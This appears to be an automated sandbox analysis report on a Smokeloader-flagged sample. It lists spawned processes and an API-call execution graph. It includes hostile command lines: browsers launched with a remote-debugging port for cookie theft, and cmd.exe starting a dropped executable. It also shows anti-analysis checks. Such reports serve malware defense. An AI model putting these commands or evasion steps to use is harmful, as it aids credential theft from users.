                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                                                Start time:17:02:06
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                                                                                Start time:17:02:07
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 --field-trial-handle=2296,i,13023938482430916518,14835191359952617541,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                                                                Start time:17:02:17
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                                                                                Start time:17:02:19
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=2280,i,18331130875080231258,16974175982020744534,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                                                                                Start time:17:02:19
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                                                                                Start time:17:02:19
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                                                                                                Start time:17:02:24
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7104 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                                                                                                Start time:17:02:25
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7268 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                                                                                                Start time:17:02:47
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\ECAFHDBGHJ.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                                                                                                Start time:17:02:47
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                                                                                Start time:17:02:48
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 3100
                                                                                                                                                                                                                                                                                                                                Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                                                                                                Start time:17:03:19
                                                                                                                                                                                                                                                                                                                                Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7264 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:6.4%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:45.5%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:5.3%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:40
                                                                                                                                                                                                                                                                                                                                  execution_graph 56924 6c60b9c0 56925 6c60b9c9 56924->56925 56926 6c60b9ce dllmain_dispatch 56924->56926 56928 6c60bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 56925->56928 56928->56926 56929 401190 56936 417a70 GetProcessHeap HeapAlloc GetComputerNameA 56929->56936 56931 40119e 56932 4011cc 56931->56932 56938 4179e0 GetProcessHeap HeapAlloc GetUserNameA 56931->56938 56934 4011b7 56934->56932 56935 4011c4 ExitProcess 56934->56935 56937 417ac9 56936->56937 56937->56931 56939 417a53 56938->56939 56939->56934 56940 416c90 56983 4022a0 56940->56983 56957 4179e0 3 API calls 56958 416cd0 56957->56958 56959 417a70 3 API calls 56958->56959 56960 416ce3 56959->56960 57116 41acc0 56960->57116 56962 416d04 56963 41acc0 4 API calls 56962->56963 56964 416d0b 56963->56964 56965 41acc0 4 API calls 56964->56965 56966 416d12 56965->56966 56967 41acc0 4 API calls 56966->56967 56968 416d19 56967->56968 56969 41acc0 4 API calls 56968->56969 56970 416d20 56969->56970 57124 41abb0 56970->57124 56972 416dac 57128 416bc0 GetSystemTime 56972->57128 56973 416d29 56973->56972 56976 416d62 OpenEventA 56973->56976 56978 416d95 CloseHandle Sleep 56976->56978 56979 416d79 56976->56979 56981 416daa 56978->56981 56982 416d81 CreateEventA 56979->56982 56981->56973 56982->56972 57326 404610 17 API calls 56983->57326 56985 4022b4 56986 404610 34 API calls 56985->56986 56987 4022cd 56986->56987 56988 404610 34 API calls 56987->56988 56989 4022e6 56988->56989 56990 404610 34 API calls 56989->56990 56991 4022ff 56990->56991 56992 404610 34 API calls 56991->56992 56993 402318 56992->56993 56994 404610 34 API calls 56993->56994 56995 402331 56994->56995 56996 404610 34 API calls 56995->56996 56997 40234a 56996->56997 56998 404610 34 API calls 56997->56998 56999 402363 56998->56999 57000 404610 34 API calls 56999->57000 57001 40237c 57000->57001 57002 404610 34 API calls 57001->57002 57003 402395 57002->57003 57004 404610 34 API calls 57003->57004 57005 4023ae 57004->57005 57006 404610 34 API calls 57005->57006 57007 4023c7 57006->57007 57008 404610 34 API calls 57007->57008 57009 4023e0 57008->57009 57010 404610 34 API calls 57009->57010 57011 4023f9 57010->57011 57012 404610 34 API calls 57011->57012 57013 402412 57012->57013 57014 404610 34 API calls 57013->57014 57015 40242b 57014->57015 57016 404610 34 API calls 57015->57016 57017 402444 57016->57017 57018 404610 34 API calls 57017->57018 57019 40245d 57018->57019 57020 404610 34 API calls 57019->57020 57021 402476 57020->57021 57022 404610 34 API calls 57021->57022 57023 40248f 57022->57023 57024 404610 34 API calls 57023->57024 57025 4024a8 57024->57025 57026 404610 34 API calls 57025->57026 57027 4024c1 57026->57027 57028 404610 34 API calls 57027->57028 57029 4024da 57028->57029 57030 404610 34 API calls 57029->57030 57031 4024f3 57030->57031 57032 404610 34 API calls 57031->57032 57033 40250c 57032->57033 57034 404610 34 API calls 57033->57034 57035 402525 57034->57035 57036 404610 34 API calls 57035->57036 57037 40253e 57036->57037 57038 404610 34 API calls 57037->57038 57039 402557 57038->57039 57040 404610 34 API calls 57039->57040 57041 402570 57040->57041 57042 404610 34 API calls 57041->57042 57043 402589 57042->57043 57044 404610 34 API calls 57043->57044 57045 4025a2 57044->57045 57046 404610 34 API calls 57045->57046 57047 4025bb 57046->57047 57048 404610 34 API calls 57047->57048 57049 4025d4 57048->57049 57050 404610 34 API calls 57049->57050 57051 4025ed 57050->57051 57052 404610 34 API calls 57051->57052 57053 402606 57052->57053 57054 404610 34 API calls 57053->57054 57055 40261f 57054->57055 57056 404610 34 API calls 57055->57056 57057 402638 57056->57057 57058 404610 34 API calls 57057->57058 57059 402651 57058->57059 57060 404610 34 API calls 57059->57060 57061 40266a 57060->57061 57062 404610 34 API calls 57061->57062 57063 402683 57062->57063 57064 404610 34 API calls 57063->57064 57065 40269c 57064->57065 57066 404610 34 API calls 57065->57066 57067 4026b5 57066->57067 57068 404610 34 API calls 57067->57068 57069 4026ce 57068->57069 57070 419bb0 57069->57070 57330 419aa0 GetPEB 57070->57330 57072 419bb8 57073 419de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 57072->57073 57074 419bca 57072->57074 57075 419e44 GetProcAddress 57073->57075 57076 419e5d 57073->57076 57077 419bdc 21 API calls 57074->57077 57075->57076 57078 419e96 57076->57078 57079 419e66 GetProcAddress GetProcAddress 57076->57079 57077->57073 57080 419eb8 57078->57080 57081 419e9f GetProcAddress 57078->57081 57079->57078 57082 419ec1 GetProcAddress 57080->57082 57083 419ed9 57080->57083 57081->57080 57082->57083 57084 416ca0 57083->57084 57085 419ee2 GetProcAddress GetProcAddress 57083->57085 57086 41aa50 57084->57086 57085->57084 57087 41aa60 57086->57087 57088 416cad 57087->57088 57089 41aa8e lstrcpy 57087->57089 57090 4011d0 57088->57090 57089->57088 57091 4011e8 57090->57091 57092 401217 57091->57092 57093 40120f ExitProcess 57091->57093 57094 401160 GetSystemInfo 57092->57094 57095 401184 57094->57095 57096 40117c ExitProcess 57094->57096 57097 401110 GetCurrentProcess VirtualAllocExNuma 57095->57097 57098 401141 ExitProcess 57097->57098 57099 401149 57097->57099 57331 4010a0 VirtualAlloc 57099->57331 57102 401220 57335 418b40 57102->57335 57105 401249 __aulldiv 57106 40129a 57105->57106 57107 401292 ExitProcess 57105->57107 57108 416a10 GetUserDefaultLangID 57106->57108 57109 416a73 GetUserDefaultLCID 57108->57109 57110 416a32 57108->57110 57109->56957 57110->57109 57111 416a61 ExitProcess 57110->57111 57112 416a43 ExitProcess 57110->57112 57113 416a57 ExitProcess 57110->57113 57114 416a6b ExitProcess 57110->57114 57115 416a4d ExitProcess 57110->57115 57114->57109 57337 41aa20 57116->57337 57118 41acd1 lstrlenA 57120 41acf0 57118->57120 57119 41ad28 57338 41aab0 57119->57338 57120->57119 57122 41ad0a lstrcpy lstrcatA 57120->57122 57122->57119 57123 41ad34 57123->56962 57125 41abcb 57124->57125 57126 41ac1b 57125->57126 57127 41ac09 lstrcpy 57125->57127 57126->56973 57127->57126 57342 416ac0 57128->57342 57130 416c2e 57131 416c38 sscanf 57130->57131 57371 41ab10 57131->57371 57133 416c4a SystemTimeToFileTime SystemTimeToFileTime 57134 416c80 57133->57134 57135 416c6e 57133->57135 57137 415d60 57134->57137 57135->57134 57136 416c78 ExitProcess 57135->57136 57138 415d6d 57137->57138 57139 41aa50 lstrcpy 57138->57139 57140 415d7e 57139->57140 57373 41ab30 lstrlenA 57140->57373 57143 41ab30 2 API calls 57144 415db4 57143->57144 57145 41ab30 2 API calls 57144->57145 57146 415dc4 57145->57146 57377 416680 57146->57377 57149 41ab30 2 API calls 57150 415de3 57149->57150 57151 41ab30 2 API calls 57150->57151 57152 415df0 57151->57152 57153 41ab30 2 API calls 57152->57153 57154 415dfd 57153->57154 57155 41ab30 2 API calls 57154->57155 57156 415e49 57155->57156 57386 4026f0 57156->57386 57164 415f13 57165 416680 lstrcpy 57164->57165 57166 415f25 57165->57166 57167 41aab0 lstrcpy 57166->57167 57168 415f42 57167->57168 57169 41acc0 4 API calls 57168->57169 57170 415f5a 57169->57170 57171 41abb0 lstrcpy 57170->57171 57172 415f66 57171->57172 57173 41acc0 4 API calls 57172->57173 57174 415f8a 57173->57174 57175 41abb0 lstrcpy 57174->57175 57176 415f96 57175->57176 57177 41acc0 4 API calls 57176->57177 57178 415fba 57177->57178 57179 41abb0 lstrcpy 57178->57179 57180 415fc6 57179->57180 57181 41aa50 lstrcpy 57180->57181 57182 415fee 57181->57182 58112 417690 GetWindowsDirectoryA 57182->58112 57185 41aab0 lstrcpy 57186 416008 57185->57186 58122 4048d0 57186->58122 57188 41600e 58267 4119f0 57188->58267 57190 416016 57191 41aa50 lstrcpy 57190->57191 57192 416039 57191->57192 57193 401590 lstrcpy 57192->57193 57194 41604d 57193->57194 58287 4059b0 57194->58287 57196 416053 58433 411280 57196->58433 57198 41605e 57199 41aa50 lstrcpy 57198->57199 57200 416082 57199->57200 57201 401590 lstrcpy 57200->57201 57202 416096 57201->57202 57203 4059b0 40 API calls 57202->57203 57204 41609c 57203->57204 58440 410fc0 57204->58440 57206 4160a7 57207 41aa50 lstrcpy 57206->57207 57208 4160c9 57207->57208 57209 401590 lstrcpy 57208->57209 57210 4160dd 57209->57210 57211 4059b0 40 API calls 57210->57211 57212 4160e3 57211->57212 58450 411170 57212->58450 57214 4160ee 57215 401590 lstrcpy 57214->57215 57216 416105 57215->57216 58458 411c60 57216->58458 57218 41610a 57219 41aa50 lstrcpy 57218->57219 57220 416126 57219->57220 58802 405000 GetProcessHeap RtlAllocateHeap InternetOpenA 57220->58802 57327 4046e7 57326->57327 57328 4046fc 11 API calls 57327->57328 57329 40479f 6 API calls 57327->57329 57328->57327 57329->56985 57330->57072 57333 4010c2 moneypunct 57331->57333 57332 4010fd 57332->57102 57333->57332 57334 4010e2 VirtualFree 57333->57334 57334->57332 57336 401233 GlobalMemoryStatusEx 57335->57336 57336->57105 57337->57118 57339 41aad2 57338->57339 57340 41aafc 57339->57340 57341 41aaea lstrcpy 57339->57341 57340->57123 57341->57340 57343 41aa50 lstrcpy 57342->57343 57344 416ad3 57343->57344 57345 41acc0 4 API calls 57344->57345 57346 416ae5 57345->57346 57347 41abb0 lstrcpy 57346->57347 57348 416aee 57347->57348 57349 41acc0 4 API calls 57348->57349 57350 416b07 57349->57350 57351 41abb0 lstrcpy 57350->57351 57352 416b10 57351->57352 57353 41acc0 4 API calls 57352->57353 57354 416b2a 57353->57354 57355 41abb0 lstrcpy 57354->57355 57356 416b33 57355->57356 57357 41acc0 4 API calls 57356->57357 57358 416b4c 57357->57358 57359 41abb0 lstrcpy 57358->57359 57360 416b55 57359->57360 57361 41acc0 4 API calls 57360->57361 57362 416b6f 57361->57362 57363 41abb0 lstrcpy 57362->57363 57364 416b78 57363->57364 57365 41acc0 4 API calls 57364->57365 57366 416b93 57365->57366 57367 41abb0 lstrcpy 57366->57367 57368 416b9c 57367->57368 57369 41aab0 lstrcpy 57368->57369 57370 416bb0 57369->57370 57370->57130 57372 41ab22 57371->57372 57372->57133 57374 41ab4f 57373->57374 57375 415da4 57374->57375 57376 41ab8b lstrcpy 57374->57376 57375->57143 57376->57375 57378 41abb0 lstrcpy 57377->57378 57379 416693 57378->57379 57380 41abb0 lstrcpy 57379->57380 57381 4166a5 57380->57381 57382 41abb0 lstrcpy 57381->57382 57383 4166b7 57382->57383 57384 41abb0 lstrcpy 57383->57384 57385 415dd6 57384->57385 57385->57149 57387 404610 34 API calls 57386->57387 57388 402704 57387->57388 57389 404610 34 API calls 57388->57389 57390 402727 57389->57390 57391 404610 34 API calls 57390->57391 57392 402740 57391->57392 57393 404610 34 API calls 57392->57393 57394 402759 57393->57394 57395 404610 34 API calls 57394->57395 57396 402786 57395->57396 57397 404610 34 API calls 57396->57397 57398 40279f 57397->57398 57399 404610 34 API calls 57398->57399 57400 4027b8 57399->57400 57401 404610 34 API calls 57400->57401 57402 4027e5 57401->57402 57403 404610 34 API calls 57402->57403 57404 4027fe 57403->57404 57405 404610 34 API calls 57404->57405 57406 402817 57405->57406 57407 404610 34 API calls 57406->57407 57408 402830 57407->57408 57409 404610 34 API calls 57408->57409 57410 402849 57409->57410 57411 404610 34 API calls 57410->57411 57412 402862 57411->57412 57413 404610 34 API calls 57412->57413 57414 40287b 57413->57414 57415 404610 34 API calls 57414->57415 57416 402894 57415->57416 57417 404610 34 API calls 57416->57417 57418 4028ad 57417->57418 57419 404610 34 API calls 57418->57419 57420 4028c6 57419->57420 57421 404610 34 API calls 57420->57421 57422 4028df 57421->57422 57423 404610 34 API calls 57422->57423 57424 4028f8 57423->57424 57425 404610 34 API calls 57424->57425 57426 402911 57425->57426 57427 404610 34 API calls 57426->57427 57428 40292a 57427->57428 57429 404610 34 API calls 57428->57429 57430 402943 57429->57430 57431 404610 34 API calls 57430->57431 57432 40295c 57431->57432 57433 404610 34 API calls 57432->57433 57434 402975 57433->57434 57435 404610 34 API calls 57434->57435 57436 40298e 57435->57436 57437 404610 34 API calls 57436->57437 57438 4029a7 57437->57438 57439 404610 34 API calls 57438->57439 57440 4029c0 57439->57440 57441 404610 34 API calls 57440->57441 57442 4029d9 57441->57442 57443 404610 34 API calls 57442->57443 57444 4029f2 57443->57444 57445 404610 34 API calls 57444->57445 57446 402a0b 57445->57446 57447 404610 34 API calls 57446->57447 57448 402a24 57447->57448 57449 404610 34 API calls 57448->57449 57450 402a3d 57449->57450 57451 404610 34 API calls 57450->57451 57452 402a56 57451->57452 57453 404610 34 API calls 57452->57453 57454 402a6f 57453->57454 57455 404610 34 API calls 57454->57455 57456 402a88 57455->57456 57457 404610 34 API calls 57456->57457 57458 402aa1 57457->57458 57459 404610 34 API calls 57458->57459 57460 402aba 57459->57460 57461 404610 34 API calls 57460->57461 57462 402ad3 57461->57462 57463 404610 34 API calls 57462->57463 57464 402aec 57463->57464 57465 404610 34 API calls 57464->57465 57466 402b05 57465->57466 57467 404610 34 API calls 57466->57467 57468 402b1e 57467->57468 57469 404610 34 API calls 57468->57469 57470 402b37 57469->57470 57471 404610 34 API calls 57470->57471 57472 402b50 57471->57472 57473 404610 34 API calls 57472->57473 57474 402b69 57473->57474 57475 404610 34 API calls 57474->57475 57476 402b82 57475->57476 57477 404610 34 API calls 57476->57477 57478 402b9b 57477->57478 57479 404610 34 API calls 57478->57479 57480 402bb4 57479->57480 57481 404610 34 API calls 57480->57481 57482 402bcd 57481->57482 57483 404610 34 API calls 57482->57483 57484 402be6 57483->57484 57485 404610 34 API calls 57484->57485 57486 402bff 57485->57486 57487 404610 34 API calls 57486->57487 57488 402c18 57487->57488 57489 404610 34 API calls 57488->57489 57490 402c31 57489->57490 57491 404610 34 API calls 57490->57491 57492 402c4a 57491->57492 57493 404610 34 API calls 57492->57493 57494 402c63 57493->57494 57495 404610 34 API calls 57494->57495 57496 402c7c 57495->57496 57497 404610 34 API calls 57496->57497 57498 402c95 57497->57498 57499 404610 34 API calls 57498->57499 57500 402cae 57499->57500 57501 404610 34 API calls 57500->57501 57502 402cc7 57501->57502 57503 404610 34 API calls 57502->57503 57504 402ce0 57503->57504 57505 404610 34 API calls 57504->57505 57506 402cf9 57505->57506 57507 404610 34 API calls 57506->57507 57508 402d12 57507->57508 57509 404610 34 API calls 57508->57509 57510 402d2b 57509->57510 57511 404610 34 API calls 57510->57511 57512 402d44 57511->57512 57513 404610 34 API calls 57512->57513 57514 402d5d 57513->57514 57515 404610 34 API calls 57514->57515 57516 402d76 57515->57516 57517 404610 34 API calls 57516->57517 57518 402d8f 57517->57518 57519 404610 34 API calls 57518->57519 57520 402da8 57519->57520 57521 404610 34 API calls 57520->57521 57522 402dc1 57521->57522 57523 404610 34 API calls 57522->57523 57524 402dda 57523->57524 57525 404610 34 API calls 57524->57525 57526 402df3 57525->57526 57527 404610 34 API calls 